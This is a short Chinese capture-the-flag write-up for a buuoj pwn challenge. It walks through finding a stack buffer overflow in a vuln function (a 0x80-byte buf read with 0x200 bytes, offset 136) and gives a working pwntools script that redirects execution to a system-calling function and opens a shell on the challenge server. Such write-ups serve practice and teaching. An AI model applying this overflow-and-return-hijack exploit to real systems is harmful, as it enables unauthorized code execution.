首先,将下载的文件用checksec检查一下
然后我们将其放入ida64中,按tap键查看源码
点开vuln函数,看见有read,buf,发现buf占0x80空间,而,read里面有0x200,所以会有溢出。
这里显示buf的地址为0x80+8,即136。
然后有发现有system函数那就简单多了,它的起始地址为0x400596
接下来写代码
from pwn import *
p=remote('node5.buuoj.cn',27192)
payload=b"A"*136+p64(0x400596)
p.send(payload)
p.interactive()